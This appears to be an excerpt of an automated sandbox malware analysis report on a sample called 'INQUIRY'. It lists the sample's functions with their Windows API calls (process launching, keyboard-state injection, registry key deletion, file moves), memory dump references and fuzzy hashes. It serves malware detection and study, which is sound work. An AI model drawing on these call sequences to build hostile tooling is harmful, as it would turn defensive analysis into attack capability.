                                                                                              • Associated: 00000000.00000002.1694303952.0000000000ACE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1694359136.0000000000AD7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_0_2_a10000_INQUIRY.jbxd
                                                                                              Similarity
                                                                                              • API ID: MessageSend$CapsCreateDeleteDeviceFontMoveObjectReleaseWindow
                                                                                              • String ID:
                                                                                              • API String ID: 3864802216-0
                                                                                              • Opcode ID: ba17fff683734a0422813f425c444e1cade41b4cf18baa4182bcb3bc85e53ae8
                                                                                              • Instruction ID: f1a54f8b2a38d6bf76a3767fccc38d2f1a5c7d20ef0785e79070cbb760aee6bc
                                                                                              • Opcode Fuzzy Hash: ba17fff683734a0422813f425c444e1cade41b4cf18baa4182bcb3bc85e53ae8
                                                                                              • Instruction Fuzzy Hash: 58316D72201210BFEF118F50CC8AFEA3BA9EF49765F044066FE08DA191DA759852CB60
                                                                                              Function 00A6BBAF Relevance: 12.1, APIs: 8, Instructions: 92COMMON
                                                                                              Download Yara Rule
                                                                                              APIs
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000000.00000002.1694224988.0000000000A11000.00000020.00000001.01000000.00000003.sdmp, Offset: 00A10000, based on PE: true
                                                                                              • Associated: 00000000.00000002.1694213265.0000000000A10000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1694268621.0000000000A9F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1694268621.0000000000AC4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1694303952.0000000000ACE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1694359136.0000000000AD7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_0_2_a10000_INQUIRY.jbxd
                                                                                              Similarity
                                                                                              • API ID: _memcmp
                                                                                              • String ID:
                                                                                              • API String ID: 2931989736-0
                                                                                              • Opcode ID: fba00a43bc5b314b04c780fbcf77411a2d69e7f7b2bbda02b6e01ed2d1ddde9b
                                                                                              • Instruction ID: 6229743bd2d36869496d52bd82f0702437ed6df63c9d8c798b95e691866cf0a2
                                                                                              • Opcode Fuzzy Hash: fba00a43bc5b314b04c780fbcf77411a2d69e7f7b2bbda02b6e01ed2d1ddde9b
                                                                                              • Instruction Fuzzy Hash: C821CDB16112057BE2146B25AE42FFB737CEE15398F084420FD04DB683EB65DFA182B1
                                                                                              Function 00A7EB23 Relevance: 10.8, APIs: 5, Strings: 1, Instructions: 323COMMON
                                                                                              Download Yara Rule
                                                                                              APIs
                                                                                                • Part of subcall function 00A19837: __itow.LIBCMT ref: 00A19862
                                                                                                • Part of subcall function 00A19837: __swprintf.LIBCMT ref: 00A198AC
                                                                                                • Part of subcall function 00A2FC86: _wcscpy.LIBCMT ref: 00A2FCA9
                                                                                              • _wcstok.LIBCMT ref: 00A7EC94
                                                                                              • _wcscpy.LIBCMT ref: 00A7ED23
                                                                                              • _memset.LIBCMT ref: 00A7ED56
                                                                                              Strings
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000000.00000002.1694224988.0000000000A11000.00000020.00000001.01000000.00000003.sdmp, Offset: 00A10000, based on PE: true
                                                                                              • Associated: 00000000.00000002.1694213265.0000000000A10000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1694268621.0000000000A9F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1694268621.0000000000AC4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1694303952.0000000000ACE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1694359136.0000000000AD7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_0_2_a10000_INQUIRY.jbxd
                                                                                              Similarity
                                                                                              • API ID: _wcscpy$__itow__swprintf_memset_wcstok
                                                                                              • String ID: X
                                                                                              • API String ID: 774024439-3081909835
                                                                                              • Opcode ID: 7fc5213a914ca13ada16a7c7f8af6a31a27ad89d53df5299e83da763efceb11d
                                                                                              • Instruction ID: 44f81811ffdeaa67c54fb5d2d791b14ff4f430c989c278300bff1907d8f47bb0
                                                                                              • Opcode Fuzzy Hash: 7fc5213a914ca13ada16a7c7f8af6a31a27ad89d53df5299e83da763efceb11d
                                                                                              • Instruction Fuzzy Hash: 07C15F756083009FC754EF64C951A9EB7E4FF89310F14896DF8999B2A2DB30ED45CB82
                                                                                              Function 00A11424 Relevance: 10.7, APIs: 7, Instructions: 219COMMON
                                                                                              Download Yara Rule
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000000.00000002.1694224988.0000000000A11000.00000020.00000001.01000000.00000003.sdmp, Offset: 00A10000, based on PE: true
                                                                                              • Associated: 00000000.00000002.1694213265.0000000000A10000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1694268621.0000000000A9F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1694268621.0000000000AC4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1694303952.0000000000ACE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1694359136.0000000000AD7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_0_2_a10000_INQUIRY.jbxd
                                                                                              Similarity
                                                                                              • API ID:
                                                                                              • String ID:
                                                                                              • API String ID:
                                                                                              • Opcode ID: d43189ee112641a9057db13a6362b8abf8c5769fb8eac49ba1326db82d52085d
                                                                                              • Instruction ID: dd3088248eb7ac2375e4cdf0bd640621eb1054ea8bb3fb7c40a08a96fedf544c
                                                                                              • Opcode Fuzzy Hash: d43189ee112641a9057db13a6362b8abf8c5769fb8eac49ba1326db82d52085d
                                                                                              • Instruction Fuzzy Hash: 5C716D74900109EFCB04CF98CC89AFEBB79FF85710F248159FA15AA251D734AA91CFA4
                                                                                              Function 00A86B76 Relevance: 10.7, APIs: 7, Instructions: 212COMMON
                                                                                              Download Yara Rule
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000000.00000002.1694224988.0000000000A11000.00000020.00000001.01000000.00000003.sdmp, Offset: 00A10000, based on PE: true
                                                                                              • Associated: 00000000.00000002.1694213265.0000000000A10000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1694268621.0000000000A9F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1694268621.0000000000AC4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1694303952.0000000000ACE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1694359136.0000000000AD7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_0_2_a10000_INQUIRY.jbxd
                                                                                              Similarity
                                                                                              • API ID:
                                                                                              • String ID:
                                                                                              • API String ID:
                                                                                              • Opcode ID: 7652b0a92e1ec42e2fff93dc8f7e0c565f01ae6065c2c2479e3feda69798d976
                                                                                              • Instruction ID: b6b6b15a44b483e3642e33a5530f47d811068bcc83911c2d7f6e2adc94549d6a
                                                                                              • Opcode Fuzzy Hash: 7652b0a92e1ec42e2fff93dc8f7e0c565f01ae6065c2c2479e3feda69798d976
                                                                                              • Instruction Fuzzy Hash: A061DD72608300AFD710FB64CD92EAFB7E8AF84714F104919F9469B292DA30ED41CB92
                                                                                              Function 00A9B351 Relevance: 10.7, APIs: 7, Instructions: 199windowCOMMON
                                                                                              Download Yara Rule
                                                                                              APIs
                                                                                              • IsWindow.USER32(010E5838), ref: 00A9B3EB
                                                                                              • IsWindowEnabled.USER32(010E5838), ref: 00A9B3F7
                                                                                              • SendMessageW.USER32(?,0000041C,00000000,00000000), ref: 00A9B4DB
                                                                                              • SendMessageW.USER32(010E5838,000000B0,?,?), ref: 00A9B512
                                                                                              • IsDlgButtonChecked.USER32(?,?), ref: 00A9B54F
                                                                                              • GetWindowLongW.USER32(010E5838,000000EC), ref: 00A9B571
                                                                                              • SendMessageW.USER32(?,000000A1,00000002,00000000), ref: 00A9B589
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000000.00000002.1694224988.0000000000A11000.00000020.00000001.01000000.00000003.sdmp, Offset: 00A10000, based on PE: true
                                                                                              • Associated: 00000000.00000002.1694213265.0000000000A10000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1694268621.0000000000A9F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1694268621.0000000000AC4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1694303952.0000000000ACE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1694359136.0000000000AD7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_0_2_a10000_INQUIRY.jbxd
                                                                                              Similarity
                                                                                              • API ID: MessageSendWindow$ButtonCheckedEnabledLong
                                                                                              • String ID:
                                                                                              • API String ID: 4072528602-0
                                                                                              • Opcode ID: e8786b7aa22fb8d261a2910c9cff7d6393cacd4e6c7514485d01bfc9e5029479
                                                                                              • Instruction ID: 232da549436854a6038d15036d29d33a7f1239baeae28e40ec605044a874b060
                                                                                              • Opcode Fuzzy Hash: e8786b7aa22fb8d261a2910c9cff7d6393cacd4e6c7514485d01bfc9e5029479
                                                                                              • Instruction Fuzzy Hash: 1471A034710204EFDF20DF64EA94FBA7BF5EF49300F14415AEA4697262C731A851EB60
                                                                                              Function 00A8F41E Relevance: 10.7, APIs: 5, Strings: 1, Instructions: 177COMMON
                                                                                              Download Yara Rule
                                                                                              APIs
                                                                                              • _memset.LIBCMT ref: 00A8F448
                                                                                              • _memset.LIBCMT ref: 00A8F511
                                                                                              • ShellExecuteExW.SHELL32(?), ref: 00A8F556
                                                                                                • Part of subcall function 00A19837: __itow.LIBCMT ref: 00A19862
                                                                                                • Part of subcall function 00A19837: __swprintf.LIBCMT ref: 00A198AC
                                                                                                • Part of subcall function 00A2FC86: _wcscpy.LIBCMT ref: 00A2FCA9
                                                                                              • GetProcessId.KERNEL32(00000000), ref: 00A8F5CD
                                                                                              • CloseHandle.KERNEL32(00000000), ref: 00A8F5FC
                                                                                              Strings
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000000.00000002.1694224988.0000000000A11000.00000020.00000001.01000000.00000003.sdmp, Offset: 00A10000, based on PE: true
                                                                                              • Associated: 00000000.00000002.1694213265.0000000000A10000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1694268621.0000000000A9F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1694268621.0000000000AC4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1694303952.0000000000ACE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1694359136.0000000000AD7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_0_2_a10000_INQUIRY.jbxd
                                                                                              Similarity
                                                                                              • API ID: _memset$CloseExecuteHandleProcessShell__itow__swprintf_wcscpy
                                                                                              • String ID: @
                                                                                              • API String ID: 3522835683-2766056989
                                                                                              • Opcode ID: 5dead13cf613079a54bcc93b7bfbef1835f78cd2a045ef30147740c64db44546
                                                                                              • Instruction ID: 165a747eb09a7e9fa66b6519c4146dab9126abbf092f3799d4244ee13cfef2b2
                                                                                              • Opcode Fuzzy Hash: 5dead13cf613079a54bcc93b7bfbef1835f78cd2a045ef30147740c64db44546
                                                                                              • Instruction Fuzzy Hash: B2618D75A006199FCB14EFA4C9919AEBBF5FF49310F148069E855AB351CB30AE81CF94
                                                                                              Function 00A70F4D Relevance: 10.7, APIs: 7, Instructions: 166windowCOMMON
                                                                                              Download Yara Rule
                                                                                              APIs
                                                                                              • GetParent.USER32(?), ref: 00A70F8C
                                                                                              • GetKeyboardState.USER32(?), ref: 00A70FA1
                                                                                              • SetKeyboardState.USER32(?), ref: 00A71002
                                                                                              • PostMessageW.USER32(?,00000101,00000010,?), ref: 00A71030
                                                                                              • PostMessageW.USER32(?,00000101,00000011,?), ref: 00A7104F
                                                                                              • PostMessageW.USER32(?,00000101,00000012,?), ref: 00A71095
                                                                                              • PostMessageW.USER32(?,00000101,0000005B,?), ref: 00A710B8
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000000.00000002.1694224988.0000000000A11000.00000020.00000001.01000000.00000003.sdmp, Offset: 00A10000, based on PE: true
                                                                                              • Associated: 00000000.00000002.1694213265.0000000000A10000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1694268621.0000000000A9F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1694268621.0000000000AC4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1694303952.0000000000ACE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1694359136.0000000000AD7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_0_2_a10000_INQUIRY.jbxd
                                                                                              Similarity
                                                                                              • API ID: MessagePost$KeyboardState$Parent
                                                                                              • String ID:
                                                                                              • API String ID: 87235514-0
                                                                                              • Opcode ID: 827ec72c743e9ec96712780d06f653dbe3b20ec34cb18140ba4ca47087634bbd
                                                                                              • Instruction ID: f67ac775beb70af65629d64d81c3870c0f0f03b6fe408ac8f0ee9c3d88929f4d
                                                                                              • Opcode Fuzzy Hash: 827ec72c743e9ec96712780d06f653dbe3b20ec34cb18140ba4ca47087634bbd
                                                                                              • Instruction Fuzzy Hash: F151E1A06047D57DFB3647388C05BBABEE95B06304F08C589E1DC8A8C3C2A9ACDAD751
                                                                                              Function 00A70D66 Relevance: 10.7, APIs: 7, Instructions: 165windowCOMMON
                                                                                              Download Yara Rule
                                                                                              APIs
                                                                                              • GetParent.USER32(00000000), ref: 00A70DA5
                                                                                              • GetKeyboardState.USER32(?), ref: 00A70DBA
                                                                                              • SetKeyboardState.USER32(?), ref: 00A70E1B
                                                                                              • PostMessageW.USER32(00000000,00000100,00000010,?), ref: 00A70E47
                                                                                              • PostMessageW.USER32(00000000,00000100,00000011,?), ref: 00A70E64
                                                                                              • PostMessageW.USER32(00000000,00000100,00000012,?), ref: 00A70EA8
                                                                                              • PostMessageW.USER32(00000000,00000100,0000005B,?), ref: 00A70EC9
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000000.00000002.1694224988.0000000000A11000.00000020.00000001.01000000.00000003.sdmp, Offset: 00A10000, based on PE: true
                                                                                              • Associated: 00000000.00000002.1694213265.0000000000A10000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1694268621.0000000000A9F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1694268621.0000000000AC4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1694303952.0000000000ACE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1694359136.0000000000AD7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_0_2_a10000_INQUIRY.jbxd
                                                                                              Similarity
                                                                                              • API ID: MessagePost$KeyboardState$Parent
                                                                                              • String ID:
                                                                                              • API String ID: 87235514-0
                                                                                              • Opcode ID: db1949eda6fa0390ad7c29567fd66ed63922b4d230c0181fe6c323c4761519f2
                                                                                              • Instruction ID: 74a14d4454bb8949bdec17bee40505e5601271dcdacdec195bcf692484885be5
                                                                                              • Opcode Fuzzy Hash: db1949eda6fa0390ad7c29567fd66ed63922b4d230c0181fe6c323c4761519f2
                                                                                              • Instruction Fuzzy Hash: FA51F4A16047D5BDFB3687748C45FBABEA99B06300F08C889F1DC868C3D395AC99D750
                                                                                              Function 00A755FD Relevance: 10.6, APIs: 7, Instructions: 138timeCOMMON
                                                                                              Download Yara Rule
                                                                                              APIs
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000000.00000002.1694224988.0000000000A11000.00000020.00000001.01000000.00000003.sdmp, Offset: 00A10000, based on PE: true
                                                                                              • Associated: 00000000.00000002.1694213265.0000000000A10000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1694268621.0000000000A9F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1694268621.0000000000AC4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1694303952.0000000000ACE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1694359136.0000000000AD7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_0_2_a10000_INQUIRY.jbxd
                                                                                              Similarity
                                                                                              • API ID: _wcsncpy$LocalTime
                                                                                              • String ID:
                                                                                              • API String ID: 2945705084-0
                                                                                              • Opcode ID: a99a0b09e4e7ececf6ecf30f41d54f7bc8fa1aa05653f32d771935f8bb3d3d15
                                                                                              • Instruction ID: a8c5dd6f84cbccd571a3d647a893712167c276031a61fef01ba78b99478625e0
                                                                                              • Opcode Fuzzy Hash: a99a0b09e4e7ececf6ecf30f41d54f7bc8fa1aa05653f32d771935f8bb3d3d15
                                                                                              • Instruction Fuzzy Hash: FD419076D10614B6CB15EBB48C86ACFB3B8AF05310F50C966F518E3221FB74E255C7AA
                                                                                              Function 00A73671 Relevance: 10.6, APIs: 5, Strings: 1, Instructions: 111filestringCOMMON
                                                                                              Download Yara Rule
                                                                                              APIs
                                                                                                • Part of subcall function 00A7466E: GetFullPathNameW.KERNEL32(00000000,00007FFF,?,?,?,?,?,?,00A73697,?), ref: 00A7468B
                                                                                                • Part of subcall function 00A7466E: GetFullPathNameW.KERNEL32(?,00007FFF,?,?,?,?,?,00A73697,?), ref: 00A746A4
                                                                                              • lstrcmpiW.KERNEL32(?,?), ref: 00A736B7
                                                                                              • _wcscmp.LIBCMT ref: 00A736D3
                                                                                              • MoveFileW.KERNEL32(?,?), ref: 00A736EB
                                                                                              • _wcscat.LIBCMT ref: 00A73733
                                                                                              • SHFileOperationW.SHELL32(?), ref: 00A7379F
                                                                                              Strings
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000000.00000002.1694224988.0000000000A11000.00000020.00000001.01000000.00000003.sdmp, Offset: 00A10000, based on PE: true
                                                                                              • Associated: 00000000.00000002.1694213265.0000000000A10000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1694268621.0000000000A9F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1694268621.0000000000AC4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1694303952.0000000000ACE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1694359136.0000000000AD7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_0_2_a10000_INQUIRY.jbxd
                                                                                              Similarity
                                                                                              • API ID: FileFullNamePath$MoveOperation_wcscat_wcscmplstrcmpi
                                                                                              • String ID: \*.*
                                                                                              • API String ID: 1377345388-1173974218
                                                                                              • Opcode ID: ab53737d6d1ed99ca62e87501993c490c5eb1c846270ed9949673e0ec880c6da
                                                                                              • Instruction ID: e6712cc7dae174ab9c33a21a23aaea4698cee3b680be74f445b56a57a32e450b
                                                                                              • Opcode Fuzzy Hash: ab53737d6d1ed99ca62e87501993c490c5eb1c846270ed9949673e0ec880c6da
                                                                                              • Instruction Fuzzy Hash: 20418172508345AECB55EF64C941ADFB7ECAF88380F40892EF499C3251EB34D689C756
                                                                                              Function 00A97291 Relevance: 10.6, APIs: 5, Strings: 1, Instructions: 103windowCOMMON
                                                                                              Download Yara Rule
                                                                                              APIs
                                                                                              • _memset.LIBCMT ref: 00A972AA
                                                                                              • GetMenuItemInfoW.USER32(?,000000FF,00000000,00000030), ref: 00A97351
                                                                                              • IsMenu.USER32(?), ref: 00A97369
                                                                                              • InsertMenuItemW.USER32(?,?,00000001,00000030), ref: 00A973B1
                                                                                              • DrawMenuBar.USER32 ref: 00A973C4
                                                                                              Strings
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000000.00000002.1694224988.0000000000A11000.00000020.00000001.01000000.00000003.sdmp, Offset: 00A10000, based on PE: true
                                                                                              • Associated: 00000000.00000002.1694213265.0000000000A10000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1694268621.0000000000A9F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1694268621.0000000000AC4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1694303952.0000000000ACE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1694359136.0000000000AD7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_0_2_a10000_INQUIRY.jbxd
                                                                                              Similarity
                                                                                              • API ID: Menu$Item$DrawInfoInsert_memset
                                                                                              • String ID: 0
                                                                                              • API String ID: 3866635326-4108050209
                                                                                              • Opcode ID: 30b2ec74c254fd9cdd1cb5305f4a1e31f23967dce8aa9792ead3aa443ea2e178
                                                                                              • Instruction ID: 439a14ed9aa8daabbeb9887579b7a2c8cbe9a1ae00355bb716f75f36e8538ca8
                                                                                              • Opcode Fuzzy Hash: 30b2ec74c254fd9cdd1cb5305f4a1e31f23967dce8aa9792ead3aa443ea2e178
                                                                                              • Instruction Fuzzy Hash: 6A411575A14208EFDF20DFA0D884A9EBBF8FB09350F14852AFD15AB250D730AD50EB60
                                                                                              Function 00A90FA5 Relevance: 10.6, APIs: 7, Instructions: 101registryCOMMON
                                                                                              Download Yara Rule
                                                                                              APIs
                                                                                              • RegEnumKeyExW.ADVAPI32(?,00000000,?,000000FF,00000000,00000000,00000000,?,?,?), ref: 00A90FD4
                                                                                              • RegOpenKeyExW.ADVAPI32(?,?,00000000,?,?), ref: 00A90FFE
                                                                                              • FreeLibrary.KERNEL32(00000000), ref: 00A910B5
                                                                                                • Part of subcall function 00A90FA5: RegCloseKey.ADVAPI32(?), ref: 00A9101B
                                                                                                • Part of subcall function 00A90FA5: FreeLibrary.KERNEL32(?), ref: 00A9106D
                                                                                                • Part of subcall function 00A90FA5: RegEnumKeyExW.ADVAPI32(?,00000000,?,000000FF,00000000,00000000,00000000,?), ref: 00A91090
                                                                                              • RegDeleteKeyW.ADVAPI32(?,?), ref: 00A91058
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000000.00000002.1694224988.0000000000A11000.00000020.00000001.01000000.00000003.sdmp, Offset: 00A10000, based on PE: true
                                                                                              • Associated: 00000000.00000002.1694213265.0000000000A10000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1694268621.0000000000A9F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1694268621.0000000000AC4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1694303952.0000000000ACE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1694359136.0000000000AD7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_0_2_a10000_INQUIRY.jbxd
                                                                                              Similarity
                                                                                              • API ID: EnumFreeLibrary$CloseDeleteOpen
                                                                                              • String ID:
                                                                                              • API String ID: 395352322-0
                                                                                              • Opcode ID: d0135b5244a5906d81b43129ec115fbc3e0629bc1c421702071733e7184997d4
                                                                                              • Instruction ID: bb13edd31b8fa35955f0baeab67a0a37ceef950da99dd8c73ca7672e9c0c435e
                                                                                              • Opcode Fuzzy Hash: d0135b5244a5906d81b43129ec115fbc3e0629bc1c421702071733e7184997d4
                                                                                              • Instruction Fuzzy Hash: 2A31EBB1A01109BFDF15DF94DC89EFFB7BCEF08350F10016AE512E2151EA759E859AA0
                                                                                              Function 00A962CD Relevance: 10.6, APIs: 7, Instructions: 99windowCOMMON
                                                                                              Download Yara Rule
                                                                                              APIs
                                                                                              • SendMessageW.USER32(00000000,000000F0,00000000,00000000), ref: 00A962EC
                                                                                              • GetWindowLongW.USER32(010E5838,000000F0), ref: 00A9631F
                                                                                              • GetWindowLongW.USER32(010E5838,000000F0), ref: 00A96354
                                                                                              • SendMessageW.USER32(00000000,000000F1,00000000,00000000), ref: 00A96386
                                                                                              • SendMessageW.USER32(00000000,000000F1,00000001,00000000), ref: 00A963B0
                                                                                              • GetWindowLongW.USER32(00000000,000000F0), ref: 00A963C1
                                                                                              • SetWindowLongW.USER32(00000000,000000F0,00000000), ref: 00A963DB
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000000.00000002.1694224988.0000000000A11000.00000020.00000001.01000000.00000003.sdmp, Offset: 00A10000, based on PE: true
                                                                                              • Associated: 00000000.00000002.1694213265.0000000000A10000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1694268621.0000000000A9F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1694268621.0000000000AC4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1694303952.0000000000ACE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1694359136.0000000000AD7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_0_2_a10000_INQUIRY.jbxd
                                                                                              Similarity
                                                                                              • API ID: LongWindow$MessageSend
                                                                                              • String ID:
                                                                                              • API String ID: 2178440468-0
                                                                                              • Opcode ID: 3ac93ea58e93dce64a0b6fe9471f9035ef425abb7c7510e021c751f0789c8758
                                                                                              • Instruction ID: 2c862e428284e2a21f767c84a8ec797db0bba8bd7a3dbf2735b65bee763bc8a6
                                                                                              • Opcode Fuzzy Hash: 3ac93ea58e93dce64a0b6fe9471f9035ef425abb7c7510e021c751f0789c8758
                                                                                              • Instruction Fuzzy Hash: 1C31F034744250AFDF21CFA9DC85F5A37E1BB5A714F1901A6F601CF2B2CB71A841AB50
                                                                                              Function 00A6DAEB Relevance: 10.6, APIs: 7, Instructions: 95memoryCOMMON
                                                                                              Download Yara Rule
                                                                                              APIs
                                                                                              • MultiByteToWideChar.KERNEL32(00000000,00000000,?,000000FF,00000000,00000000), ref: 00A6DB2E
                                                                                              • MultiByteToWideChar.KERNEL32(00000000,00000000,?,000000FF,00000000,00000000), ref: 00A6DB54
                                                                                              • SysAllocString.OLEAUT32(00000000), ref: 00A6DB57
                                                                                              • SysAllocString.OLEAUT32(?), ref: 00A6DB75
                                                                                              • SysFreeString.OLEAUT32(?), ref: 00A6DB7E
                                                                                              • StringFromGUID2.OLE32(?,?,00000028), ref: 00A6DBA3
                                                                                              • SysAllocString.OLEAUT32(?), ref: 00A6DBB1
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000000.00000002.1694224988.0000000000A11000.00000020.00000001.01000000.00000003.sdmp, Offset: 00A10000, based on PE: true
                                                                                              • Associated: 00000000.00000002.1694213265.0000000000A10000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1694268621.0000000000A9F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1694268621.0000000000AC4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1694303952.0000000000ACE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1694359136.0000000000AD7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_0_2_a10000_INQUIRY.jbxd
                                                                                              Similarity
                                                                                              • API ID: String$Alloc$ByteCharMultiWide$FreeFrom
                                                                                              • String ID:
                                                                                              • API String ID: 3761583154-0
                                                                                              • Opcode ID: a71097fbd6a00350979eb2aee69a37e112fba71725431388ad4c53a89addba31
                                                                                              • Instruction ID: e390c8cdb201934f1cb8bcafa666122d41713b14af5b5f5e4b69d639abdcaecf
                                                                                              • Opcode Fuzzy Hash: a71097fbd6a00350979eb2aee69a37e112fba71725431388ad4c53a89addba31
                                                                                              • Instruction Fuzzy Hash: F4216276B00219AFDF10EFA8DC88CBB77BCEB093A0B158566F954DB254DA709C4187A4
